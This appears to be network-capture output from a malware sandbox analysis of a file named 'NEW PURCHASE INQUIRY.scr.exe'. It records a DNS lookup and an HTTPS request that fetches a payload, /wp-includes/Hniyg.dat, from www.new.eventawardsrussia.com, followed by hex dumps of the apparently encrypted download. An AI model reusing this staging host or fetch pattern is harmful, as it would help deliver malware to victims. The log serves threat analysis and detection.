                                      Jan 9, 2025 08:19:03.170409918 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.170458078 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.172055960 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.172072887 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.172125101 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.172132969 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.172188997 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.172957897 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.172972918 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.173036098 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.173043013 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.173089027 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.173882961 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.173898935 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.173953056 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.173959970 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.174002886 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.174828053 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.174844027 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.174895048 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.174901962 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.174947977 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.175666094 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.175683022 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.175736904 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.175745010 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.175790071 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.176402092 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.176419973 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.176474094 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.176481009 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.176523924 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.177439928 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.177453995 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.177500963 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.177511930 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.177551985 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.178365946 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.178380966 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.178427935 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.178435087 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.178476095 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.179184914 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.179200888 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.179255009 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.179261923 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.179303885 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.179641008 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.179656029 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.179707050 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.179714918 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.179755926 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.180669069 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.180685997 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.180737972 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.180743933 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.180794001 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.181608915 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.181628942 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.181682110 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.181691885 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.181735992 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.182265997 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.182281971 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.182339907 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.182351112 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.182418108 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.182674885 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.182691097 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.182746887 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.182754993 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.182801962 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.183666945 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.183682919 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.183733940 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.183741093 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.183784008 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.184590101 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.184607029 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.184659958 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.184668064 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.184711933 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.185323000 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.185340881 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.185396910 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.185403109 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.185420990 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.185441017 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.185445070 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.185453892 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.185477018 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.185525894 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.186350107 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.186366081 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.186420918 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.186428070 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.186470985 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.187256098 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.187273026 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.187336922 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.187344074 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.187388897 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.187979937 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.187994957 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.188054085 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.188060999 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.188100100 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.188939095 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.188954115 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.189004898 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.189006090 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.189018011 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.189035892 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.189068079 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.189075947 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.189104080 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.189117908 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.189924955 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.189949036 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.189994097 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.190001011 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.190026999 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.190046072 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.190645933 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.190660000 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.190710068 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.190717936 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.190758944 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.191428900 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.191443920 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.191500902 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.191508055 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.191521883 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.191549063 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.191555977 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.191567898 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.191581964 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.191617966 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.192362070 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.192378044 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.192436934 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.192445040 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.192488909 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.192949057 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.192962885 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.193041086 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.193048000 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.193106890 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.193850994 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.193866968 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.193911076 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.193917036 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.193923950 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.193955898 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.193962097 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.193975925 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.194010019 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.195183039 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.195199013 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.195259094 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.195266008 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.195276022 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.195295095 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.195307016 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.195317984 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.195343971 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.195372105 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.196208954 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.196224928 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.196268082 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.196278095 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.196290970 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.196306944 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.196341991 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.197326899 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.197341919 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.197396994 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.197403908 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.197413921 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.197434902 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.197470903 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.197479010 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.197504997 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.198347092 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.198360920 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.198410988 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.198420048 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.199096918 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.199121952 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.199153900 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.199161053 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.199177980 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.199414968 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.199435949 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.199470997 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.199477911 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.199487925 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.199496984 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.199521065 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.199548006 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.199556112 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.199579000 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.200469971 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.200490952 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.200545073 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.200552940 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.201318979 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.201337099 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.201376915 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.201384068 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.201394081 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.201420069 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.201435089 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.201466084 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.201472044 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.201483011 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.202361107 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.202380896 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.202419043 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.202425957 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.202435970 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.202445984 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.202450991 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.202476978 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.202483892 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.202508926 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.203351974 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.203372955 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.203411102 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.203418970 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.203433990 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.203454018 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.203458071 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.203486919 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.203493118 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.203514099 CET443497045.23.51.54192.168.2.5
                                      Jan 9, 2025 08:19:03.203524113 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.203541040 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.203569889 CET49704443192.168.2.55.23.51.54
                                      Jan 9, 2025 08:19:03.212702036 CET49704443192.168.2.55.23.51.54
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 9, 2025 08:19:00.377917051 CET6294853192.168.2.51.1.1.1
                                      Jan 9, 2025 08:19:00.617194891 CET53629481.1.1.1192.168.2.5
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 9, 2025 08:19:00.377917051 CET192.168.2.51.1.1.10x7139Standard query (0)www.new.eventawardsrussia.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 9, 2025 08:19:00.617194891 CET1.1.1.1192.168.2.50x7139No error (0)www.new.eventawardsrussia.com5.23.51.54A (IP address)IN (0x0001)false
                                      • www.new.eventawardsrussia.com
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.5497045.23.51.544437156C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-09 07:19:01 UTC225OUTGET /wp-includes/Hniyg.dat HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                      Host: www.new.eventawardsrussia.com
                                      Connection: Keep-Alive
                                      2025-01-09 07:19:01 UTC220INHTTP/1.1 200 OK
                                      Server: nginx/1.26.1
                                      Date: Thu, 09 Jan 2025 07:19:01 GMT
                                      Content-Length: 1374216
                                      Connection: close
                                      Last-Modified: Tue, 07 Jan 2025 21:03:57 GMT
                                      ETag: "14f808-62b24155f0d0e"
                                      Accept-Ranges: bytes
                                      2025-01-09 07:19:01 UTC16164INData Raw: f7 a6 4b 16 af ee f1 7b c3 79 03 f5 ff 50 a3 c9 3e ed 93 62 d1 5e 9a 3e 31 48 72 24 49 0e 4a 37 ab 44 0d da a8 a6 96 53 6f 56 f5 49 c9 3d 77 3a 0e f4 c8 df c3 17 17 c3 d8 d7 59 af 4c 5e cb 75 d7 1f 95 35 a5 f8 2f e7 b7 8d 19 09 b0 b1 b3 72 5d c3 03 e8 a7 14 e5 33 4f 31 8a 07 0d cb 95 72 7e 3c 79 c7 42 19 ae ac 21 a5 92 01 fd a5 f0 09 76 c4 4f 3a 0a 36 9b a9 ab 82 26 62 a0 c5 a3 72 d4 e8 ce 6d e1 a6 f3 89 a5 40 c9 dd dc ac aa 11 4f 72 ea e4 24 b5 ea a7 7c 88 a1 33 e7 36 1e 38 c7 34 22 ea 06 a3 d8 61 71 a9 0d 96 a1 53 02 f3 8c e0 3d a0 13 24 a6 67 6c c8 e7 ea 1a d6 7f fd 85 3e 03 2f 64 26 5e 34 cd 2e 79 1d ff b3 cf eb b6 9c 9c ea 47 6f 21 6c df 42 95 47 fb 0d 4a 42 fa 7e 12 1d e1 a1 f3 54 d8 47 ac 78 eb 53 8c e8 1c 73 84 03 aa 19 af 9c 0d 55 bf 3f 4c f5 f6
                                      Data Ascii: K{yP>b^>1Hr$IJ7DSoVI=w:YL^u5/r]3O1r~<yB!vO:6&brm@Or$|3684"aqS=$gl>/d&^4.yGo!lBGJB~TGxSsU?L
                                      2025-01-09 07:19:01 UTC16384INData Raw: fd 7f bc 49 ae 4e f9 28 f4 9b 77 25 c7 71 21 92 29 b9 ce 6f 7a 08 7a 8e a8 5a 27 a9 14 a2 91 67 1b 7c 78 f8 f1 63 4f 9d 46 1a bb 78 40 f1 4d c9 76 24 a8 ff 7a e4 34 84 d8 9d fa f7 25 d2 c1 5c 13 5e 38 d1 87 23 91 68 79 4d 48 1d 71 d5 1b 12 6c 19 87 26 34 3d ac 4e 66 6a 56 05 06 f8 bc 3f ed 2d fb be 71 02 52 69 8d ff 58 a6 aa 43 7c 5d f9 09 5a df a3 83 a0 9b e6 08 f8 0b bf 2e 81 35 d5 74 40 bb 52 52 e2 f3 57 f1 cc 3f 0a 2d 96 e1 63 b0 bf 78 35 3c 85 fb 4d f1 e5 68 df dc dd 0f 67 27 14 99 80 88 66 83 aa fe 57 d7 36 ae 3e 6e 1e 61 ca 67 cc 21 a0 ac 96 7a dd 48 71 12 87 f1 95 d8 ae f2 ac 1d 06 a6 9c 2e e2 c0 b0 7d f4 d9 bd 93 0a 77 ee b4 37 29 ac f4 da 9e 6b ab 85 84 64 4d 52 62 42 f3 1e 34 4e 5b 21 71 e4 fd 93 4c 22 de bb 29 c2 48 7c 87 90 39 09 6e bf 6d 3f
                                      Data Ascii: IN(w%q!)ozzZ'g|xcOFx@Mv$z4%\^8#hyMHql&4=NfjV?-qRiXC|]Z.5t@RRW?-cx5<Mhg'fW6>nag!zHq.}w7)kdMRbB4N[!qL")H|9nm?
                                      2025-01-09 07:19:02 UTC16384INData Raw: 1d a8 bc 98 4e 45 c5 a4 f3 4b e1 2b 75 ae 87 1d e7 9c 61 12 9d fe 2f 36 c7 17 35 ce 83 44 fc ba cc 1f d5 69 dd 43 17 13 d6 0f b1 93 d5 0b 2b 6f c5 60 88 1e 17 66 61 ec d4 44 e8 5f 4a ec 9e 1f f1 35 a2 3c 55 d5 52 13 dd ac 88 7b a8 91 18 42 e9 28 ec 7c cf 09 dc 9f 03 65 23 9d ca 63 f9 fc 26 14 7a 3f f7 38 8f 03 6c 3f 46 45 49 07 41 95 ab b6 79 9d 38 97 03 11 96 14 75 21 dc 85 04 a4 01 0d f1 d0 06 ec a6 e6 33 cb 23 20 e3 be ff a1 f7 83 d4 f1 80 18 fa 58 03 a1 80 94 7c 44 63 90 93 00 92 da 16 6c 3c f9 2b 62 23 46 f2 cd b4 1e 6d c1 26 5a 71 c2 1e 32 d7 86 9d e4 6f 73 5b 0b 2a 25 0c c3 64 a2 db 3d 87 8c f0 3a 36 39 f8 52 70 ac 19 b2 11 af b6 b2 3e 41 32 c1 0d 8f 25 11 6a af 35 23 81 e4 00 fb 22 00 30 1a b5 21 4d aa 72 bb b9 f1 46 d0 2f 42 71 1e 90 a2 24 10 c3
                                      Data Ascii: NEK+ua/65DiC+o`faD_J5<UR{B(|e#c&z?8l?FEIAy8u!3# X|Dcl<+b#Fm&Zq2os[*%d=:69Rp>A2%j5#"0!MrF/Bq$
                                      2025-01-09 07:19:02 UTC16384INData Raw: c2 8d f1 e2 78 ab a1 86 65 a1 15 20 32 e5 ff 13 28 30 5c fd bb 06 ae 93 cb c0 a5 3d 2b 1f 3a f8 fe e3 1a b7 bd 64 4d f2 c3 4e 13 73 4b 9b 50 f7 62 3e 05 8a 49 27 03 37 c9 be ae 75 37 dd 92 c1 90 04 01 86 68 61 19 9e b9 db 70 eb 60 25 c4 f8 7a c7 6c f7 b6 e7 57 18 51 a0 3f 2d 50 8f fb 45 2f 95 7f 15 9c c3 f1 d8 09 78 4c 7f 02 10 0a c8 21 7b 94 35 5d b0 35 d1 20 10 5a e4 46 c7 95 b7 eb 14 56 0f 1c fd 00 0c 45 66 6c 53 be b7 4a ca d3 03 1d 96 af 29 7f e2 9f b8 31 32 c9 35 18 c9 3b 8d 11 a2 59 b0 f4 7e 9c a7 91 f0 88 9f 04 14 bf ec 0b 0d a9 40 3d fd a3 ec c2 ac b1 7b 32 f5 a7 e9 81 38 31 87 06 e4 4f d6 7b e9 7b 53 81 f3 e3 b4 0c 3f b6 3e 20 85 09 98 e7 46 8a 8b fd 86 76 41 61 87 2d b6 45 90 a9 8e f4 dc 52 cb 27 04 d8 b9 ca 97 11 70 e9 f3 1d 93 18 a5 ef 0d 3d
                                      Data Ascii: xe 2(0\=+:dMNsKPb>I'7u7hap`%zlWQ?-PE/xL!{5]5 ZFVEflSJ)125;Y~@={281O{{S?> FvAa-ER'p=
                                      2025-01-09 07:19:02 UTC16384INData Raw: f1 17 73 85 ba e6 a9 ff 34 2f d5 46 e3 27 52 30 77 ee 15 54 89 86 e0 60 25 a2 7c 6c 12 e0 f2 3a 31 7c 3b fc b6 5d f1 75 a6 41 69 21 d2 3c 0e 6a 38 67 a6 1e 5e 28 44 0d 6c fe 55 a4 67 9c 4b 1c 35 2c d7 ff e9 a9 2a 4a 54 f9 6f d5 34 f9 83 3b 3f a4 97 32 fd d1 3d 7a f6 c8 8f 03 da 9c b7 b5 42 9c 10 e1 cd df 92 91 d8 c5 1a 37 59 e1 81 b6 db 1a 67 c0 c5 ee 20 06 8f 8f 1b 2a dd a2 af 9f 5a 56 02 a8 c6 53 20 d9 41 6f b8 ec 5c f4 82 4d fb b9 71 2b 62 ad 40 95 d0 4d 44 ac b8 07 2d 5a ea 80 1c 4e 42 10 2b 2e 09 23 9b 8b 40 03 48 70 0a 3c 77 b1 3c 00 a9 bb f6 0e 63 7d 72 24 29 39 77 1f c1 de da 56 19 c7 f0 2b 7f 01 55 9c a6 dc f7 a9 88 00 aa 68 12 2f e4 10 88 8c 20 d3 b2 37 e3 02 63 23 bb 1a 65 0c 83 1e 45 22 25 85 c3 d5 8b a7 e0 4b 07 ab bc 4c 4e 87 0e d8 04 c9 9c
                                      Data Ascii: s4/F'R0wT`%|l:1|;]uAi!<j8g^(DlUgK5,*JTo4;?2=zB7Yg *ZVS Ao\Mq+b@MD-ZNB+.#@Hp<w<c}r$)9wV+Uh/ 7c#eE"%KLN
